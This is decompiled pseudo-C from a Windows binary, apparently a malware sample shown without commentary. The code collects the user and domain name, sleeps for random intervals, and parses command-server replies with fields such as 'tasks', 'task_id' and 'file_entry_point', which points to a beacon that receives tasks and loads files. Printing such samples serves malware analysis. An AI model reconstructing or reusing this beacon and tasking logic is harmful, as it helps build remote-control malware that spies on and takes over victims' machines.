                				E00000285285C8056B10(0xc814e1e0, _t1824 - 0x50, 0xc814d140, 0xc814d140, (_t1918 | 0xffffffff) + 1);
                				E00000285285C80571E0(0, 0, 0xc814e1e0, _t1824 + 0xd0, 0xc814e190, 0xc814d140, _t1826 + 0x70, _t1891);
                				r15d = 0x1000;
                				_t1259 =  *(_t1824 - 0x38);
                				if (_t1259 - 0x10 < 0) goto 0xc805a1b6;
                				_t1407 =  *((intOrPtr*)(_t1824 - 0x50));
                				if (_t1259 + 1 - _t1921 < 0) goto 0xc805a1b1;
                				if (0 == 0) goto 0xc805a184;
                				0xc80caadc();
                				asm("int3");
                				_t1261 =  *((intOrPtr*)(_t1407 - 8));
                				if (_t1261 - _t1407 < 0) goto 0xc805a193;
                				0xc80caadc();
                				asm("int3");
                				_t1408 = _t1407 - _t1261;
                				if (_t1408 - 8 >= 0) goto 0xc805a1a2;
                				0xc80caadc();
                				asm("int3");
                				if (_t1408 - 0x27 <= 0) goto 0xc805a1ae;
                				0xc80caadc();
                				asm("int3");
                				0xc80c51e4();
                				 *(_t1824 - 0x38) = 0xf;
                				 *(_t1824 - 0x40) = _t1918;
                				 *((char*)(_t1824 - 0x50)) = 0;
                				_t1262 =  *(_t1824 - 0x78);
                				if (_t1262 - 0x10 < 0) goto 0xc805a21a;
                				_t1410 =  *((intOrPtr*)(_t1826 + 0x70));
                				if (_t1262 + 1 - _t1921 < 0) goto 0xc805a215;
                				if (0 == 0) goto 0xc805a1e8;
                				0xc80caadc();
                				asm("int3");
                				_t1264 =  *((intOrPtr*)(_t1410 - 8));
                				if (_t1264 - _t1410 < 0) goto 0xc805a1f7;
                				0xc80caadc();
                				asm("int3");
                				_t1411 = _t1410 - _t1264;
                				if (_t1411 - 8 >= 0) goto 0xc805a206;
                				0xc80caadc();
                				asm("int3");
                				if (_t1411 - 0x27 <= 0) goto 0xc805a212;
                				0xc80caadc();
                				asm("int3");
                				0xc80c51e4();
                				 *(_t1824 - 0x78) = 0xf;
                				 *(_t1824 - 0x80) = _t1918;
                				 *((char*)(_t1826 + 0x70)) = 0;
                				if ( *(_t1826 + 0x60) == 0) goto 0xc805a34c;
                				_t1684 =  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50;
                				r8d =  *(_t1826 + 0x60);
                				E00000285285C8051080(_t1824 + 0x390,  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50);
                				r8d = 0x50;
                				E00000285285C80512A0(_t1824 + 0x390, "127.0.0.1", _t1891);
                				_t1687 =  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50;
                				r8d =  *(_t1826 + 0x60);
                				E00000285285C8051080(_t1824 + 0x760,  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50);
                				r8d = 0x50;
                				E00000285285C80512A0(_t1824 + 0x760, 0xc814e190, _t1891);
                				_t1690 =  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50;
                				r8d =  *(_t1826 + 0x60);
                				E00000285285C8051080(_t1824 + 0x870,  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50);
                				r8d = 0x50;
                				E00000285285C80512A0(_t1824 + 0x870, 0xc814e1e0, _t1891);
                				_t1693 =  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50;
                				r8d =  *(_t1826 + 0x60);
                				E00000285285C8051080(_t1824 + 0x650,  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50);
                				r8d = r15d;
                				E00000285285C8051290(E00000285285C8051290(E00000285285C8051290(E00000285285C8051290(E00000285285C80512A0(_t1824 + 0x650, 0xc814d140, _t1891), _t1824 + 0x650), _t1824 + 0x870), _t1824 + 0x760), _t1824 + 0x390);
                				 *(_t1824 + 0x1c0) = _t1918;
                				 *(_t1824 + 0x1c8) = _t1918;
                				 *(_t1824 + 0x1c8) = 0xf;
                				 *(_t1824 + 0x1c0) = _t1918;
                				 *((char*)(_t1824 + 0x1b0)) = 0;
                				__imp__CoInitializeEx();
                				 *(_t1826 + 0x40) = _t1918;
                				 *(_t1826 + 0x38) = r14d;
                				 *(_t1826 + 0x30) = _t1918;
                				r13d = 3;
                				 *(_t1826 + 0x28) = r13d;
                				 *(_t1826 + 0x20) = r14d;
                				r9d = 0;
                				r8d = 0;
                				__imp__CoInitializeSecurity();
                				E00000285285C809A49C(_t1264, 0xc814e1e0);
                				_t129 = _t1824 + 0x370; // 0x373
                				E00000285285C809BE80(0, 0xc814e1e0, _t129, 0xc814e190, _t1826 + 0x70);
                				_t130 = _t1824 - 0x18; // -21
                				E00000285285C809BB80(0, 0xc814e1e0, _t130, 0xc814e190, _t1826 + 0x70);
                				_t131 = _t1824 + 0x370; // 0x373
                				_t132 = _t1824 + 0x2d8; // 0x2db
                				E00000285285C80595D0(_t132, _t1264, 0xc814e190, 0xc814d140, _t1824, _t131, _t1891);
                				_t1265 =  *_t1824;
                				if (_t1265 - 0x10 < 0) goto 0xc805a433;
                				_t1428 =  *((intOrPtr*)(_t1824 - 0x18));
                				if (_t1265 + 1 - _t1921 < 0) goto 0xc805a42e;
                				if (0 == 0) goto 0xc805a401;
                				0xc80caadc();
                				asm("int3");
                				_t1267 =  *((intOrPtr*)(_t1428 - 8));
                				if (_t1267 - _t1428 < 0) goto 0xc805a410;
                				0xc80caadc();
                				asm("int3");
                				_t1429 = _t1428 - _t1267;
                				if (_t1429 - 8 >= 0) goto 0xc805a41f;
                				0xc80caadc();
                				asm("int3");
                				if (_t1429 - 0x27 <= 0) goto 0xc805a42b;
                				0xc80caadc();
                				asm("int3");
                				0xc80c51e4();
                				 *_t1824 = 0xf;
                				 *(_t1824 - 8) = _t1918;
                				 *((char*)(_t1824 - 0x18)) = 0;
                				 *((long long*)(_t1824 + 0x558)) = _t1267;
                				 *((long long*)(_t1824 + 0x560)) = _t1267;
                				 *((long long*)(_t1824 + 0x568)) = _t1267;
                				 *((long long*)(_t1824 + 0x570)) = _t1267;
                				 *((long long*)(_t1824 + 0x578)) = _t1267;
                				 *((long long*)(_t1824 + 0x580)) = _t1267;
                				 *((long long*)(_t1824 + 0x588)) = _t1267;
                				 *((long long*)(_t1824 + 0x590)) = _t1267;
                				_t147 = _t1824 + 0x540; // 0x543
                				E00000285285C80515E0(_t147);
                				_t148 = _t1824 + 0x540; // 0x543
                				E00000285285C80515E0(_t148);
                				_t149 = _t1824 + 0x2d8; // 0x2db
                				_t1697 =  >=  ?  *((void*)(_t1824 + 0x2d8)) : _t149;
                				r8d =  *(_t1824 + 0x2e8);
                				_t153 = _t1824 + 0x540; // 0x543
                				E00000285285C8051630(_t153,  >=  ?  *((void*)(_t1824 + 0x2d8)) : _t149, _t131);
                				_t154 = _t1824 + 0x540; // 0x543
                				E00000285285C8053620(0xffffffff, _t154);
                				_t155 = _t1824 + 0x598; // 0x59b
                				_t156 = _t1824 + 0x1d0; // 0x1d3
                				E00000285285C8051460(_t156, _t155, _t1913);
                				_t157 = _t1824 + 0x1d0; // 0x1d3
                				if (E00000285285C8097480(_t1267, 0xc814e1e0, _t157) != 0) goto 0xc805a509;
                				__imp__CoUninitialize();
                				TerminateThread(??, ??);
                				goto 0xc805c021;
                				r8d = 0;
                				_t159 = _t1824 + 0x298; // 0x29b
                				_t160 = _t1824 + 0x1d0; // 0x1d3
                				E00000285285C805C4C0(_t1267, _t160, _t159);
                				_t162 = _t1824 + 0x4f8; // 0x4fb
                				_t163 = _t1824 + 0x1d0; // 0x1d3
                				E00000285285C805C4C0(_t1267, _t163, _t162);
                				_t164 = _t1824 + 0x220; // 0x223
                				E00000285285C809C000(0, 0xc814e1e0, _t164, 0xc814e190,  *(_t1824 + 0x1e0) >> 1);
                				if ( *((long long*)(_t1824 + 0x380)) == 0) goto 0xc805a5bc;
                				r8d = 1;
                				_t166 = _t1824 + 0x220; // 0x223
                				E00000285285C8058C10(0xc814e1e0, _t166, "\n", 0xc814e190, _t1824,  *(_t1824 + 0x1e0) >> 1);
                				_t167 = _t1824 + 0x370; // 0x373
                				_t168 = _t1824 + 0x2b8; // 0x2bb
                				E00000285285C80593D0(0xc814e1e0, _t168, "User name: ", 0xc814d140, _t1824, _t167,  *(_t1824 + 0x1e0) >> 0x00000001 | 0xffffffff);
                				r8d = r8d ^ r8d;
                				_t169 = _t1824 + 0x220; // 0x223
                				_t762 = E00000285285C8058D60(0xc814e1e0, _t169, _t1267, 0xc814e190, 0xc814d140, _t1824, _t167,  *(_t1824 + 0x1e0) >> 0x00000001 | 0xffffffffffffffff);
                				_t170 = _t1824 + 0x2b8; // 0x2bb
                				E00000285285C8056820(_t762, 0, _t170);
                				_t171 = _t1824 + 0x4d8; // 0x4db
                				E00000285285C809BD00(0, 0xc814e1e0, _t171, 0xc814e190, _t167);
                				if ( *((long long*)(_t1824 + 0x4e8)) == 0) goto 0xc805a627;
                				_t173 = _t1824 + 0x220; // 0x223
                				E00000285285C8058C10(0xc814e1e0, _t173, "\n", 0xc814e190, _t1824, 0xc814d140);
                				_t174 = _t1824 + 0x4d8; // 0x4db
                				_t175 = _t1824 + 0x2b8; // 0x2bb
                				E00000285285C80593D0(0xc814e1e0, _t175, "Domain name: ", 0xc814d140, _t1824, _t174,  *(_t1824 + 0x1e0) >> 0x00000001 | 0xffffffffffffffff);
                				r8d = r8d ^ r8d;
                				_t176 = _t1824 + 0x220; // 0x223
                				_t767 = E00000285285C8058D60(0xc814e1e0, _t176, _t1267, 0xc814e190, 0xc814d140, _t1824, _t174,  *(_t1824 + 0x1e0) >> 0x00000001 | 0xffffffffffffffff);
                				_t177 = _t1824 + 0x2b8; // 0x2bb
                				E00000285285C8056820(_t767, 0, _t177);
                				 *(_t1824 + 0x250) = _t1918;
                				 *(_t1824 + 0x258) = _t1918;
                				 *(_t1824 + 0x258) = 0xf;
                				 *(_t1824 + 0x250) = _t1918;
                				 *((char*)(_t1824 + 0x240)) = 0;
                				r8d = 0;
                				_t183 = _t1824 + 0x150; // 0x153
                				_t184 = _t1824 + 0x240; // 0x243
                				_t769 = E00000285285C8056C40(0xc814e1e0, _t184, _t183, 0xc814e190, 0xc814d140, _t174,  *(_t1824 + 0x1e0) >> 0x00000001 | 0xffffffffffffffff);
                				_t185 = _t1824 + 0x298; // 0x29b
                				_t1709 =  >=  ?  *((void*)(_t1824 + 0x298)) : _t185;
                				r8d = 0;
                				_t189 = _t1824 + 0x240; // 0x243
                				E00000285285C8056A20(_t769, _t189,  >=  ?  *((void*)(_t1824 + 0x298)) : _t185, _t174,  *((intOrPtr*)(_t1824 + 0x2a8)));
                				 *(_t1824 + 0x9c8) = _t1267 != 0xffffffff;
                				asm("xorps xmm0, xmm0");
                				asm("movdqu [ebp-0x30], xmm0");
                				 *(_t1824 - 0x20) = _t1918;
                				asm("o16 nop [eax+eax]");
                				_t968 = r14d;
                				_t1710 =  *((intOrPtr*)(_t1824 + 0xd0));
                				if ( *((intOrPtr*)(_t1824 + 0xd8)) - _t1710 >> 6 == 0) goto 0xc805b901;
                				_t194 = (_t1918 << 6) + _t1710 + 0x20; // 0x20
                				if (E00000285285C806A380(_t968, 0, 0, _t1042,  *((intOrPtr*)(_t1824 + 0xd8)) - _t1710 >> 6, 0xc814e1e0, (_t1918 << 6) + _t1710, _t194, 0xc814d140, _t1824, _t174,  *((intOrPtr*)(_t1824 + 0x2a8)), _t1912) != 0) goto 0xc805a728;
                				_t969 = _t968 + 1;
                				if (_t969 -  *((intOrPtr*)(_t1824 + 0xd8)) -  *((intOrPtr*)(_t1824 + 0xd0)) >> 6 < 0) goto 0xc805a6f0;
                				goto 0xc805b901;
                				 *0xc81530a8 = _t969;
                				r12d = r14d;
                				 *(_t1824 + 0x9d0) = r14d;
                				_t198 = _t1824 - 0x30; // -45
                				 *(_t1826 + 0x20) = _t198;
                				_t200 = _t1824 + 0x220; // 0x223
                				_t201 = _t1824 + 0x190; // 0x193
                				_t202 = _t1824 + 0x1d0; // 0x1d3
                				E00000285285C8093D60(_t198, 0xc814e1e0, _t1826 + 0x70, _t202, _t201, _t200);
                				 *(_t1826 + 0x20) = _t1826 + 0x50;
                				_t1900 = _t1826 + 0x70;
                				_t209 = _t1824 - 0x70; // -109
                				E00000285285C806A7F0(0, 0, _t1042, 1, _t969 -  *((intOrPtr*)(_t1824 + 0xd8)) -  *((intOrPtr*)(_t1824 + 0xd0)) >> 6, 0xc814e1e0, _t209, ( *0xc81530a8 << 6) +  *((intOrPtr*)(_t1824 + 0xd0)), 0xffffffff, 0xc814d140, _t1824, ( *0xc81530a8 << 6) +  *((intOrPtr*)(_t1824 + 0xd0)) + 0x20, _t1900, _t1912);
                				if ( *(_t1824 - 0x60) != 0) goto 0xc805a885;
                				r8d = E00000285285C80CAB54(_t1826 + 0x50);
                				r8d = r8d - (0x28c1979 * r8d >> 0x20 >> 1) * 0xc9;
                				r8d = r8d + 0x19;
                				_t988 = r8d * 0x3e8;
                				Sleep(??);
                				_t1276 =  *((intOrPtr*)(_t1824 - 0x58));
                				if (_t1276 - 0x10 < 0) goto 0xc805a813;
                				_t1458 =  *((intOrPtr*)(_t1824 - 0x70));
                				if (_t1276 + 1 - _t1921 < 0) goto 0xc805a80e;
                				if ((_t988 & 0x0000001f) != 0) goto 0xc805b944;
                				_t1278 =  *((intOrPtr*)(_t1458 - 8));
                				if (_t1278 - _t1458 >= 0) goto 0xc805b93e;
                				_t1459 = _t1458 - _t1278;
                				if (_t1459 - 8 < 0) goto 0xc805b938;
                				if (_t1459 - 0x27 > 0) goto 0xc805b932;
                				0xc80c51e4();
                				 *((long long*)(_t1824 - 0x58)) = 0xf;
                				 *(_t1824 - 0x60) = _t1918;
                				 *((char*)(_t1824 - 0x70)) = 0;
                				_t1279 =  *(_t1824 - 0x78);
                				if (_t1279 - 0x10 < 0) goto 0xc805a86f;
                				_t1461 =  *((intOrPtr*)(_t1826 + 0x70));
                				if (_t1279 + 1 - _t1921 < 0) goto 0xc805a86a;
                				if ((_t988 & 0x0000001f) != 0) goto 0xc805b95c;
                				_t1281 =  *((intOrPtr*)(_t1461 - 8));
                				if (_t1281 - _t1461 >= 0) goto 0xc805b956;
                				_t1462 = _t1461 - _t1281;
                				if (_t1462 - 8 < 0) goto 0xc805b950;
                				if (_t1462 - 0x27 > 0) goto 0xc805b94a;
                				0xc80c51e4();
                				 *(_t1824 - 0x78) = 0xf;
                				 *(_t1824 - 0x80) = _t1918;
                				 *((char*)(_t1826 + 0x70)) = 0;
                				goto 0xc805a6c0;
                				if ( *(_t1826 + 0x60) == 0) goto 0xc805a8db;
                				_t1718 =  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50;
                				r8d =  *(_t1826 + 0x60);
                				_t236 = _t1824 + 0x650; // 0x653
                				E00000285285C8051080(_t236,  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50);
                				_t237 = _t1824 - 0x70; // -109
                				_t1720 =  >=  ?  *((void*)(_t1824 - 0x70)) : _t237;
                				r8d =  *(_t1824 - 0x60);
                				_t241 = _t1824 + 0x650; // 0x653
                				_t778 = E00000285285C8051420( *((long long*)(_t1824 - 0x58)) - 0x10, _t241,  >=  ?  *((void*)(_t1824 - 0x70)) : _t237);
                				_t242 = _t1824 + 0x650; // 0x653
                				E00000285285C8051290(_t778, _t242);
                				 *(_t1824 + 0xf0) = _t1281;
                				 *(_t1824 + 0xf8) = _t1281;
                				 *((intOrPtr*)(_t1824 + 0xfe)) = r14w;
                				asm("xorps xmm0, xmm0");
                				asm("movdqa [ebp+0x100], xmm0");
                				asm("xorps xmm1, xmm1");
                				asm("movdqa [ebp+0x110], xmm1");
                				asm("movdqa [ebp+0x120], xmm0");
                				 *(_t1824 + 0x130) = _t1918;
                				 *((long long*)(_t1824 + 0x138)) = 0x400;
                				 *(_t1824 + 0x140) = r14d;
                				 *(_t1824 + 0x148) = _t1918;
                				if ( *(_t1824 + 0x100) != _t1281) goto 0xc805a96e;
                				E00000285285C80C4DCC(_t1281, _t242);
                				 *(_t1824 + 0x4c8) = _t1281;
                				 *_t1281 = _t1918;
                				_t1281[1] = 0x10000;
                				_t1281[2] = _t1918;
                				_t1281[3] = _t1918;
                				_t1281[4] = _t1918;
                				 *(_t1824 + 0x100) = _t1281;
                				 *(_t1824 + 0x108) = _t1281;
                				_t259 = _t1824 - 0x70; // -109
                				_t1722 =  >=  ?  *((void*)(_t1824 - 0x70)) : _t259;
                				_t262 = _t1824 + 0xf0; // 0xf3
                				E00000285285C805CF30(0xc814e1e0, _t262,  >=  ?  *((void*)(_t1824 - 0x70)) : _t259, 0xc814d140);
                				if (_t1281[0xa] == 0) goto 0xc805aa9a;
                				r8d = E00000285285C80CAB54(_t1281);
                				r8d = r8d - (0x28c1979 * r8d >> 0x20 >> 1) * 0xc9;
                				r8d = r8d + 0x19;
                				_t991 = r8d * 0x3e8;
                				Sleep(??);
                				if ( *(_t1824 + 0x108) == 0) goto 0xc805a9d2;
                				E00000285285C805C610(0xc814e1e0,  *(_t1824 + 0x108));
                				0xc80caea4();
                				E00000285285C80C51EC(_t1281, 0xc814e1e0, 0xc814d140);
                				_t1282 =  *((intOrPtr*)(_t1824 - 0x58));
                				if (_t1282 - 0x10 < 0) goto 0xc805aa39;
                				_t1471 =  *((intOrPtr*)(_t1824 - 0x70));
                				if (_t1282 + 1 - _t1921 < 0) goto 0xc805aa34;
                				if ((_t991 & 0x0000001f) != 0) goto 0xc805b974;
                				_t1284 =  *((intOrPtr*)(_t1471 - 8));
                				if (_t1284 - _t1471 >= 0) goto 0xc805b96e;
                				_t1472 = _t1471 - _t1284;
                				if (_t1472 - 8 < 0) goto 0xc805b968;
                				if (_t1472 - 0x27 > 0) goto 0xc805b962;
                				0xc80c51e4();
                				 *((long long*)(_t1824 - 0x58)) = 0xf;
                				 *(_t1824 - 0x60) = _t1918;
                				 *((char*)(_t1824 - 0x70)) = 0;
                				_t1285 =  *(_t1824 - 0x78);
                				if (_t1285 - 0x10 < 0) goto 0xc805a86f;
                				_t1474 =  *((intOrPtr*)(_t1826 + 0x70));
                				if (_t1285 + 1 - _t1921 < 0) goto 0xc805a86a;
                				if ((_t991 & 0x0000001f) != 0) goto 0xc805b98c;
                				_t1287 =  *((intOrPtr*)(_t1474 - 8));
                				if (_t1287 - _t1474 >= 0) goto 0xc805b986;
                				_t1475 = _t1474 - _t1287;
                				if (_t1475 - 8 < 0) goto 0xc805b980;
                				if (_t1475 - 0x27 > 0) goto 0xc805b97a;
                				goto 0xc805a867;
                				_t1820 =  *((intOrPtr*)(_t1824 - 0x30));
                				E00000285285C805CA80(0xc814e1e0, _t1820,  *((intOrPtr*)(_t1824 - 0x28)), ( *0xc81530a8 << 6) +  *((intOrPtr*)(_t1824 + 0xd0)) + 0x20);
                				_t1922 = _t1820;
                				 *((long long*)(_t1824 - 0x28)) = _t1820;
                				if ( *((short*)(_t1824 + 0xfe)) != 3) goto 0xc805b7f0;
                				_t1289 =  *(_t1824 + 0xf8) & 0xffffffff;
                				_t1368 = (0xc814e1e0 << 5) + _t1289;
                				_t290 = _t1824 + 0x4c0; // 0x4c3
                				_t291 = _t1824 + 0xf0; // 0xf3
                				E00000285285C805C830(1, _t1368, _t291, _t290, _t1820, _t1824, "response_status");
                				if ( *_t1289 == _t1368) goto 0xc805ab49;
                				 *(_t1824 + 0x38) = _t1289;
                				 *(_t1824 + 0x40) = _t1289;
                				 *((short*)(_t1824 + 0x46)) = 0x405;
                				_t1292 =  *(_t1824 + 0x40) & 0x00000000 | "response_status";
                				 *(_t1824 + 0x40) = _t1292;
                				 *(_t1824 + 0x38) = 0xf;
                				_t298 = _t1824 + 0x38; // 0x3b
                				_t299 = _t1824 + 0xf0; // 0xf3
                				E00000285285C805CE20(_t299, _t298, 0xffffffff, _t1820, _t1824, _t1918, _t1922);
                				r12d =  *_t1292;
                				 *(_t1824 + 0x9d0) = r12d;
                				_t1294 =  *(_t1824 + 0xf8) & 0xffffffff;
                				_t1370 = (_t1368 << 5) + _t1294;
                				_t303 = _t1824 + 0x4b8; // 0x4bb
                				_t304 = _t1824 + 0xf0; // 0xf3
                				E00000285285C805C830(1, _t1370, _t304, _t303, _t1820, _t1824, "tasks");
                				if ( *_t1294 == _t1370) goto 0xc805b0dd;
                				 *(_t1824 + 0x48) = _t1294;
                				 *(_t1824 + 0x50) = _t1294;
                				 *((short*)(_t1824 + 0x56)) = 0x405;
                				_t1297 =  *(_t1824 + 0x50) & 0x00000000 | "tasks";
                				 *(_t1824 + 0x50) = _t1297;
                				 *(_t1824 + 0x48) = 5;
                				_t311 = _t1824 + 0x48; // 0x4b
                				_t312 = _t1824 + 0xf0; // 0xf3
                				E00000285285C805CE20(_t312, _t311, 0xffffffff, _t1820, _t1824, _t1918, _t1922);
                				if ( *((short*)(_t1297 + 0xe)) != 4) goto 0xc805b0dd;
                				 *(_t1824 + 0x58) = _t1297;
                				 *(_t1824 + 0x60) = _t1297;
                				 *((short*)(_t1824 + 0x66)) = 0x405;
                				 *(_t1824 + 0x60) =  *(_t1824 + 0x60) & 0x00000000 | "tasks";
                				 *(_t1824 + 0x58) = 5;
                				_t320 = _t1824 + 0x58; // 0x5b
                				_t321 = _t1824 + 0xf0; // 0xf3
                				_t798 = E00000285285C805CE20(_t321, _t320, 0xffffffff, _t1820, _t1824, _t1918, _t1922);
                				_t322 = _t1824 + 0x260; // 0x263
                				E00000285285C805C4B0(_t798,  *(_t1824 + 0x60) & 0x00000000 | "tasks", _t322);
                				_t1301 =  *((intOrPtr*)(_t1824 + 0x260));
                				_t1812 = _t1301[2] & 0xffffffff;
                				r14d =  *_t1301;
                				_t1920 = (_t1918 << 4) + _t1812;
                				if (_t1812 == _t1920) goto 0xc805b0d7;
                				r13d = 0;
                				 *(_t1824 + 0x3a0) = _t1917;
                				 *(_t1824 + 0x3a8) = _t1917;
                				 *(_t1824 + 0x3a8) = 0xf;
                				 *(_t1824 + 0x3a0) = _t1917;
                				 *((char*)(_t1824 + 0x390)) = 0;
                				 *(_t1824 + 0x3c8) = _t1917;
                				 *(_t1824 + 0x3d0) = _t1917;
                				 *(_t1824 + 0x3d0) = 0xf;
                				 *(_t1824 + 0x3c8) = _t1917;
                				 *((char*)(_t1824 + 0x3b8)) = 0;
                				 *(_t1824 + 0x3e8) = _t1917;
                				 *(_t1824 + 0x3f0) = _t1917;
                				 *(_t1824 + 0x3f0) = 0xf;
                				 *(_t1824 + 0x3e8) = _t1917;
                				 *((char*)(_t1824 + 0x3d8)) = 0;
                				 *(_t1824 + 0x408) = _t1917;
                				 *(_t1824 + 0x410) = _t1917;
                				 *(_t1824 + 0x410) = 0xf;
                				 *(_t1824 + 0x408) = _t1917;
                				 *((char*)(_t1824 + 0x3f8)) = 0;
                				if ( *((short*)(_t1812 + 0xe)) != 3) goto 0xc805b07e;
                				_t1303 =  *(_t1812 + 8) & 0xffffffff;
                				_t1372 = (_t1370 << 5) + _t1303;
                				_t347 = _t1824 + 0x4b0; // 0x4b3
                				E00000285285C805C830(1, _t1372, _t1812, _t347, _t1820, _t1824, "task_data");
                				if ( *_t1303 == _t1372) goto 0xc805adb9;
                				 *(_t1824 + 0x28) = _t1303;
                				 *(_t1824 + 0x30) = _t1303;
                				 *((short*)(_t1824 + 0x36)) = 0x405;
                				_t1306 =  *(_t1824 + 0x30) & 0x00000000 | "task_data";
                				 *(_t1824 + 0x30) = _t1306;
                				 *(_t1824 + 0x28) = 9;
                				_t354 = _t1824 + 0x28; // 0x2b
                				E00000285285C805CE20(_t1812, _t354, _t1812, _t1820, _t1824, _t1920, _t1922);
                				if (( *(_t1306 + 0xe) & 0x00001000) != 0) goto 0xc805ad8e;
                				_t1308 =  *(_t1306 + 8) & 0xffffffff;
                				if ( *_t1308 != 0) goto 0xc805ad98;
                				goto 0xc805adaa;
                				if ( *((char*)(_t1308 + (_t1917 | 0xffffffff) + 1)) != 0) goto 0xc805ada0;
                				_t360 = _t1824 + 0x3b8; // 0x3bb
                				E00000285285C8056B10(_t1372, _t360, _t1308, _t1820, (_t1917 | 0xffffffff) + 1);
                				_t1310 =  *(_t1812 + 8) & 0xffffffff;
                				_t1374 = (_t1372 << 5) + _t1310;
                				_t362 = _t1824 + 0x4a8; // 0x4ab
                				E00000285285C805C830(1, _t1374, _t1812, _t362, _t1820, _t1824, "task");
                				if ( *_t1310 == _t1374) goto 0xc805ae69;
                				 *(_t1824 + 0x68) = _t1310;
                				 *(_t1824 + 0x70) = _t1310;
                				 *((short*)(_t1824 + 0x76)) = 0x405;
                				_t1313 =  *(_t1824 + 0x70) & 0x00000000 | "task";
                				 *(_t1824 + 0x70) = _t1313;
                				 *(_t1824 + 0x68) = 4;
                				_t369 = _t1824 + 0x68; // 0x6b
                				E00000285285C805CE20(_t1812, _t369, _t1812, _t1820, _t1824, _t1920, _t1922);
                				if (( *(_t1313 + 0xe) & 0x00001000) != 0) goto 0xc805ae40;
                				_t1315 =  *(_t1313 + 8) & 0xffffffff;
                				if ( *_t1315 != 0) goto 0xc805ae4a;
                				goto 0xc805ae5a;
                				if ( *((char*)(_t1315 + (_t1917 | 0xffffffff) + 1)) != 0) goto 0xc805ae50;
                				_t375 = _t1824 + 0x390; // 0x393
                				E00000285285C8056B10(_t1374, _t375, _t1315, _t1820, (_t1917 | 0xffffffff) + 1);
                				_t1317 =  *(_t1812 + 8) & 0xffffffff;
                				_t1376 = (_t1374 << 5) + _t1317;
                				_t377 = _t1824 + 0x4d0; // 0x4d3
                				E00000285285C805C830(1, _t1376, _t1812, _t377, _t1820, _t1824, "task_id");
                				if ( *_t1317 == _t1376) goto 0xc805aeee;
                				 *(_t1824 + 0x78) = _t1317;
                				 *(_t1824 + 0x80) = _t1317;
                				 *((short*)(_t1824 + 0x86)) = 0x405;
                				_t1320 =  *(_t1824 + 0x80) & 0x00000000 | "task_id";
                				 *(_t1824 + 0x80) = _t1320;
                				 *(_t1824 + 0x78) = 7;
                				_t384 = _t1824 + 0x78; // 0x7b
                				E00000285285C805CE20(_t1812, _t384, _t1812, _t1820, _t1824, _t1920, _t1922);
                				 *((intOrPtr*)(_t1824 + 0x3b0)) =  *_t1320;
                				_t1322 =  *(_t1812 + 8) & 0xffffffff;
                				_t1378 = (_t1376 << 5) + _t1322;
                				_t387 = _t1824 + 0x4a0; // 0x4a3
                				E00000285285C805C830(1, _t1378, _t1812, _t387, _t1820, _t1824, "file_entry_point");
                				if ( *_t1322 == _t1378) goto 0xc805afb9;
                				 *(_t1824 + 0x88) = _t1322;
                				 *(_t1824 + 0x90) = _t1322;
                				 *((short*)(_t1824 + 0x96)) = 0x405;
                				_t1325 =  *(_t1824 + 0x90) & 0x00000000 | "file_entry_point";
                				 *(_t1824 + 0x90) = _t1325;
                				 *(_t1824 + 0x88) = 0x10;
                				_t394 = _t1824 + 0x88; // 0x8b
                				E00000285285C805CE20(_t1812, _t394, _t1812, _t1820, _t1824, _t1920, _t1922);
                				if (( *(_t1325 + 0xe) & 0x00001000) != 0) goto 0xc805af8a;
                				_t1327 =  *(_t1325 + 8) & 0xffffffff;
                				if ( *_t1327 != 0) goto 0xc805af94;
                				goto 0xc805afaa;
                				if ( *((char*)(_t1327 + (_t1917 | 0xffffffff) + 1)) != 0) goto 0xc805afa0;
                				_t400 = _t1824 + 0x3d8; // 0x3db
                				_t818 = E00000285285C8056B10(_t1378, _t400, _t1327, _t1820, (_t1917 | 0xffffffff) + 1);
                				_t401 = _t1824 + 0x390; // 0x393
                				if (_t401 - _t1922 >= 0) goto 0xc805b039;
                				_t402 = _t1824 + 0x390; // 0x393
                				if (_t1820 - _t402 > 0) goto 0xc805b039;
                				_t403 = _t1824 + 0x390; // 0x393
                				if (_t1922 !=  *(_t1824 - 0x20)) goto 0xc805b010;
                				_t409 = _t1824 - 0x30; // -45
                				E00000285285C805C510(_t818 * (_t403 - _t1820), _t409);
                				_t1923 =  *((intOrPtr*)(_t1824 - 0x28));
                				 *((long long*)(_t1824 + 0x268)) = _t1923;
                				 *((long long*)(_t1824 + 0x270)) = _t1923;
                				if (_t1923 == 0) goto 0xc805b037;
                				_t821 = E00000285285C805D0C0(_t1327 >> 3 >> 0x3f, (_t1327 >> 3) + (_t1327 >> 3 >> 0x3f), _t1923, ((_t1327 >> 3) + (_t1327 >> 3 >> 0x3f) + ((_t1327 >> 3) + (_t1327 >> 3 >> 0x3f)) * 8 << 4) +  *((intOrPtr*)(_t1824 - 0x30)),  *((intOrPtr*)(_t1824 - 0x30)), _t1900);
                				goto 0xc805b073;
                				if (_t1923 !=  *(_t1824 - 0x20)) goto 0xc805b050;
                				_t417 = _t1824 - 0x30; // -45
                				E00000285285C805C510(_t821, _t417);
                				_t1924 =  *((intOrPtr*)(_t1824 - 0x28));
                				_t1822 =  *((intOrPtr*)(_t1824 - 0x30));
                				 *((long long*)(_t1824 + 0x270)) = _t1924;
                				 *((long long*)(_t1824 + 0x268)) = _t1924;
                				if (_t1924 == 0) goto 0xc805b073;
                				_t422 = _t1824 + 0x390; // 0x393
                				_t823 = E00000285285C805D0C0(_t1327 >> 3 >> 0x3f, (_t1327 >> 3) + (_t1327 >> 3 >> 0x3f), _t1924, _t422, _t1822, _t1900);
                				_t1925 = _t1924 + 0x90;
                				 *((long long*)(_t1824 - 0x28)) = _t1925;
                				_t424 = _t1824 + 0x3f8; // 0x3fb
                				_t824 = E00000285285C8056820(_t823, 0x1000, _t424);
                				_t425 = _t1824 + 0x3d8; // 0x3db
                				_t825 = E00000285285C8056820(_t824, 0x1000, _t425);
                				_t426 = _t1824 + 0x3b8; // 0x3bb
                				_t826 = E00000285285C8056820(_t825, 0x1000, _t426);
                				_t427 = _t1824 + 0x390; // 0x393
                				E00000285285C8056820(_t826, 0x1000, _t427);
